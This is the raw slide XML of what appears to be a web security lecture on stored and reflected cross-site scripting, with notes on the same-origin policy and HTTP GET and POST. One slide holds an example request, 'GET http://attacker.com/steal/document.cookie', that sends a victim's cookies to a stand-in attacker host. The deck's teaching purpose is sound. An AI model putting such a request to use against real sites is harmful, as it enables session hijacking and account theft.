              <a:tblGrid>
                <a:gridCol w="5410835">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2315210">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="518795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="1721485">
                        <a:lnSpc>
                          <a:spcPts val="1335"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnR w="38100">
                      <a:solidFill>
                        <a:srgbClr val="B7C1EB"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="1009015">
                        <a:lnSpc>
                          <a:spcPts val="1425"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="38100">
                      <a:solidFill>
                        <a:srgbClr val="B7C1EB"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnB w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475615">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="95250">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="204"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>E.g., </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>GET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>http://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" spc="-5" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>attacker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>/steal/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>document.cookie</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="26034" marB="0">
                    <a:lnL w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FF8000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="736600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1420"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="180340" marB="0">
                    <a:lnR w="38100">
                      <a:solidFill>
                        <a:srgbClr val="B7C1EB"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="38100">
                      <a:solidFill>
                        <a:srgbClr val="B7C1EB"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnT w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>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374753625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EC46B1-A1BF-3B46-B231-968E1EDD3803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D3C0D2-2509-6F46-8C33-05B9F130F589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>ubvers same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>ttack happens within the same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker tricks server (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to send malicious script to users:    user visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;               malicious script has origin of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> so it is permitted to access the resources on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21650946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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C29E3DC-691F-5F49-AE0C-865888B2C445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3481771"/>
            <a:ext cx="5462587" cy="3524501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3B24E7-3A7D-D540-95ED-46A82048C6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239F00E0-A3D2-4043-8997-BF3BA3D550A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8915400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example:                                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a crafted tweet that would automatically be retweeted by all followers using vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TweetDeck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419851543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84E9E3-1639-7E40-A5A0-64A99C93F958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE50A914-925D-3248-817C-E2CAA77172EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8763000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker gets the victim user to visit a URL for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that embeds a malicious JavaScript or malicious content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server echoes it back to victim user in its response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim’s browser executes the script within the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76022929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609600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA8CFD5-AD5E-494F-9F16-10490B7D4428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS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623359-5463-E34A-883C-6976F88FEB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E6931B-7BF9-4A4D-A524-D1D9CF40775A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>GET                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>request data from a specified resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>POST                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>send data to a server to create/update a resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66714113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object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71EF87E-198F-9040-BDBC-F6A18E69C496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="object 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5631877" y="2133600"/>
            <a:ext cx="2301433" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
